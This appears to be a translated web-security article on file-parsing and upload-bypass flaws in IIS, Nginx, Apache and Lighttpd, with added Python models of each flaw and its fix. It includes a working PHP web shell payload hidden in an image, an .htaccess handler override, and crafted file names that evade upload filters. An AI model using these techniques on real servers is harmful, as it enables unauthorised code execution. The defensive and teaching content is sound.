Summary of web server parsing vulnerabilities in IIS 6.0/7.0/7.5, Nginx and Apache

Source: Internet
Author: User
Tags: microsoft iis

[+] Microsoft IIS 6.0

Directory parsing: /xx.asp/xx.jpg. Here xx.jpg can be any text file (e.g. xx.txt) whose content is the backdoor code.

IIS 6.0 parses xx.jpg as an ASP file because it sits under a directory whose name ends in .asp.

Suffix parsing: /xx.asp;.jpg and /xx.asp:.jpg (here you need to intercept the upload request with a proxy and modify the file name).

IIS 6.0 parses files with such names as ASP files.

(Webmaster comment: for the cause of the IIS 6.0 vulnerability, see the short article by Luo Ge, "Brief Analysis of the IIS File Name Parsing Vulnerability".)

{/xx.asp:.jpg cannot exist as a file name on Windows; the ".jpg" part is automatically dropped and /xx.asp remains}

(Webmaster comment: there is an error here. Such a path is what is known as an "NTFS data stream"; for details, see "IIS6 Colon Upload Vulnerability" and "IIS6 Vulnerability (Upload and Exploitation)" in the comments below.)

Default parsing: /xx.asa, /xx.cer, /xx.cdx

Besides .asp, these three suffixes are executable in IIS 6.0 by default.

(Webmaster comment: this is because in the default IIS configuration these suffixes are mapped to ASP, so they have the same execute permission as .asp. You can delete the suffix mappings in the configuration to remove the risk.)

These can be combined with the directory parsing vulnerability: /xx.asa/xx.jpg, /xx.cer/xx.jpg, or xx.asa;.jpg.

[+] IIS 7.0/IIS 7.5/Nginx <= 0.8.37

When PHP runs under FastCGI in the default configuration, appending /xx.php to the path of a file (/xx.jpg) makes /xx.jpg/xx.php be parsed as a PHP file. (The root cause is PHP's cgi.fix_pathinfo=1 default, which makes PHP fall back to the nearest existing file on the path, /xx.jpg, and execute it.)

Common exploitation: merge an image with a text file containing the backdoor code, so that the malicious text is appended to the image's binary data without damaging the image header and trailer.

E.g. copy xx.jpg /B + yy.txt /A xy.jpg

######################################

/B copies xx.jpg (the normal image) in binary mode.

/A copies yy.txt (the text file) in ASCII mode.

Content of yy.txt: <?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[cmd]) ?>'); ?>

This writes a file named shell.php whose content is <?php eval($_POST[cmd]) ?>

######################################

Find somewhere to upload xy.jpg, obtain the URL of xy.jpg, and append /xx.php to that URL; requesting it executes the malicious text.

A web shell named shell.php with password cmd is then generated in the image directory.
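Why this works, as an added example that is not part of the original article: with PHP running as FastCGI and php.ini's cgi.fix_pathinfo=1 (the default), PHP receives SCRIPT_FILENAME=/var/www/uploads/xy.jpg/xx.php, finds no such file, and walks the path from the right until a component exists on disk; /var/www/uploads/xy.jpg exists, so it is executed as the script and /xx.php becomes PATH_INFO. The Python below models that walk over a constructed in-memory file list (the document root and file names are assumptions) and, beside it, the check that PHP-FPM's security.limit_extensions = .php applies.

```python
import posixpath

# Constructed sample "document root": the set of paths that exist on disk.
# These names are assumptions for the example, not from the article.
FAKE_FS = {
    "/var/www/index.php",
    "/var/www/uploads/xy.jpg",      # the uploaded image carrying the PHP payload
    "/var/www/uploads/notes.txt",
}


def fix_pathinfo_resolve(script_filename, fs=FAKE_FS):
    """Model of PHP-CGI's cgi.fix_pathinfo=1 behaviour.

    Starting from SCRIPT_FILENAME as handed over by the web server, drop the
    last path component until a path that exists is found. That path becomes
    the script to execute; the dropped tail becomes PATH_INFO.
    Returns (script, path_info), or (None, None) if nothing on the path exists.
    """
    path = posixpath.normpath(script_filename)
    path_info = ""
    while path and path != "/":
        if path in fs:
            return path, path_info
        path, tail = posixpath.split(path)
        path_info = "/" + tail + path_info
    return None, None


ALLOWED_SCRIPT_EXTENSIONS = (".php",)


def resolve_hardened(script_filename, fs=FAKE_FS, allowed=ALLOWED_SCRIPT_EXTENSIONS):
    """Same walk, but refuse to execute anything that is not a .php file.

    This is what PHP-FPM's `security.limit_extensions = .php` enforces after
    the walk. Two other fixes stop the problem earlier: `cgi.fix_pathinfo = 0`
    in php.ini disables the walk, and `try_files $uri =404;` in the nginx
    location block rejects the request before it ever reaches FastCGI.
    """
    script, path_info = fix_pathinfo_resolve(script_filename, fs)
    if script is None:
        return None, None
    if not script.lower().endswith(allowed):
        raise PermissionError("refusing to execute non-PHP file: " + script)
    return script, path_info


if __name__ == "__main__":
    req = "/var/www/uploads/xy.jpg/xx.php"
    print("vulnerable:", fix_pathinfo_resolve(req))
    try:
        print("hardened:", resolve_hardened(req))
    except PermissionError as e:
        print("hardened:", e)
```

The same walk is what makes /index.php/foo a legitimate PATH_INFO request, which is why the fix is to restrict which resolved files may execute (or to verify the file exists before proxying) rather than to reject every path with a trailing component.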

[+] Nginx <= 0.8.37

Even with FastCGI disabled, Nginx <= 0.8.37 still has a parsing vulnerability.

Append %00.php to a file path (/xx.jpg): /xx.jpg%00.php is parsed as a PHP file.

(Webmaster comment: this evolved from /test.jpg/x.php. For details, refer to "Nginx Null Byte Remote Code Execution Vulnerability".)

[+] Apache

Suffix parsing: test.php.x1.x2.x3

Apache examines the suffixes from right to left. If x3 is not a recognized suffix it moves on to x2, and so on, until it finds one it recognizes; that suffix decides how the file is parsed. (This applies when PHP is hooked in with AddHandler/AddType for the extension; an anchored <FilesMatch "\.php$"> is not affected.)

test.php.x1.x2.x3 will be parsed as PHP.

From experience: php, php3 and phtml are suffixes Apache parses as PHP.

(Webmaster comment: for the Apache parsing vulnerability, refer to "Apache Suffix Parsing Vulnerability".)

[+] Other available

On Windows, file names such as "xx.jpg " (trailing space) or "xx.jpg." (trailing dot) cannot exist. If you name a file that way, Windows strips the trailing spaces or dots by default, which can also be exploited!

When uploading to a Windows host, intercept the request, modify the file name by adding spaces or dots at the end, and try to bypass the blacklist. If the upload succeeds, the trailing dot or space is removed on disk, and you get your shell.

I remember that FCKeditor PHP 2.6 had this space bypass vulnerability. {Not on Linux hosts: Linux allows such file names.}
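How the names above slip past an extension blacklist, as an added example that is not part of the original article: the check sees the literal name the client sent, while the server or file system later acts on a different name. The Python below models the three behaviours this page relies on (IIS 6 stopping at ";", NTFS treating ":" as an alternate data stream, and Windows stripping trailing dots and spaces), shows a naive blacklist passing each of them, and gives the allow-list check a practitioner would use instead. The blacklist and allow-list contents are assumptions for the example.

```python
import os
import re

# Constructed lists for the example (assumptions, not from the article).
BLACKLIST = {".php", ".php3", ".phtml", ".asp", ".asa", ".cer", ".cdx", ".aspx", ".jsp"}
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def naive_blacklist_check(filename):
    """Typical weak check: look only at the literal extension of the submitted name."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLIST


def iis6_effective_name(filename):
    """IIS 6 chooses the handler from the name up to the first ';'."""
    return filename.split(";", 1)[0]


def windows_stored_name(filename):
    """Name NTFS/Win32 actually creates: ':' starts an alternate data stream
    (the data lands in the base file name), and trailing dots and spaces are dropped."""
    base = filename.split(":", 1)[0]
    return base.rstrip(". ")


def hardened_check(filename, allowed=ALLOWLIST):
    """Allow-list check applied to the name as it would exist on disk.

    Returns (accepted, name_to_store). Rejects anything containing a character
    that some server or file system interprets, normalizes the rest the way
    Windows would, allows exactly one extension, and requires it to be listed.
    """
    if re.search(r"[\x00;:/\\]", filename):
        return False, None
    name = filename.rstrip(". ")          # what Windows would store anyway
    stem, ext = os.path.splitext(name)
    if not stem or "." in stem:           # no double extensions
        return False, None
    if ext.lower() not in allowed:
        return False, None
    return True, name


if __name__ == "__main__":
    for submitted in ["xx.asp;.jpg", "xx.asp:.jpg", "shell.php.", "shell.php ", "photo.jpg"]:
        print(repr(submitted), "blacklist passes:", naive_blacklist_check(submitted),
              "| IIS6 sees", repr(iis6_effective_name(submitted)),
              "| NTFS stores", repr(windows_stored_name(submitted)),
              "| hardened:", hardened_check(submitted))
```

The point of normalizing before checking is that the decision is made on the same name the file system will use; rejecting the separator characters outright means the server-side parsing rules never get a chance to apply.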

If .htaccess is honored by Apache (when AllowOverride for the directory is set to All in Apache's httpd.conf, Apache applies the configuration in the .htaccess file in that directory),

and you can upload one, try writing the following into .htaccess:

<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>

Replace shell.jpg with the name of the file you uploaded. The shell.jpg file will then be parsed as PHP.
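The right-to-left suffix rule in the Apache section and the .htaccess trick just above share one mechanism, mod_mime's handling of file extensions, so here is one added example (not code from the original article) covering both. mod_mime inspects every dot-separated extension in a file name; each one mapped by AddHandler/AddType sets the corresponding attribute, unknown ones are ignored, and where several extensions set the same attribute the rightmost wins. The Python below models that for the handler attribute, then models the FilesMatch check, first with the unanchored pattern from the .htaccess above and then with an anchored "\.php$" pattern, which is the fix. The handler table is an assumption for the example.

```python
import re

# Constructed handler table, modelling an httpd.conf containing
#   AddHandler application/x-httpd-php .php .php3 .phtml
# (an assumption for the example, not from the article).
ADDHANDLER = {
    ".php": "application/x-httpd-php",
    ".php3": "application/x-httpd-php",
    ".phtml": "application/x-httpd-php",
}

PHP_HANDLER = "application/x-httpd-php"


def mod_mime_handler(filename, handlers=ADDHANDLER):
    """Model of mod_mime multiple-extension processing for the handler attribute.

    Every extension after the first dot is examined; a recognized one sets the
    handler, an unrecognized one is ignored, and a later (rightmost) recognized
    extension overrides an earlier one. So test.php.x1.x2.x3 is handled as PHP,
    and so is shell.php.jpg even though .jpg also sets the content type.
    """
    handler = None
    for ext in filename.split(".")[1:]:
        mapped = handlers.get("." + ext.lower())
        if mapped is not None:
            handler = mapped
    return handler


def filesmatch_handler(filename, pattern):
    """Model of <FilesMatch pattern> SetHandler application/x-httpd-php.

    Apache treats the pattern as an unanchored regular expression matched
    against the file name, so "shell.jpg" matches any name containing it and
    only an anchored pattern such as r"\.php$" restricts execution to .php.
    """
    if re.search(pattern, filename):
        return PHP_HANDLER
    return None


# The .htaccess line from the article: unanchored, matches any name containing shell.jpg
UPLOADED_HTACCESS_PATTERN = r"shell.jpg"
# Anchored pattern: only names whose final extension is .php get the handler
ANCHORED_PATTERN = r"\.php$"


if __name__ == "__main__":
    for name in ["test.php.x1.x2.x3", "shell.php.jpg", "shell.jpg", "index.php"]:
        print(name,
              "| AddHandler:", mod_mime_handler(name),
              "| uploaded .htaccess:", filesmatch_handler(name, UPLOADED_HTACCESS_PATTERN),
              "| anchored FilesMatch:", filesmatch_handler(name, ANCHORED_PATTERN))
```

Two configuration consequences follow: hook PHP in with an anchored FilesMatch block rather than a bare AddHandler, so test.php.x1.x2.x3 and shell.php.jpg are served as files instead of executed, and keep AllowOverride None on upload directories so an uploaded .htaccess cannot add a handler at all.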

[+] Lighttpd

xx.jpg/xx.php is parsed as PHP, in the same way as with Nginx above.

[Add by El4pse]

PS: I am not sure I have written everything correctly. If something is wrong or missing, please help me correct it. Thank you.
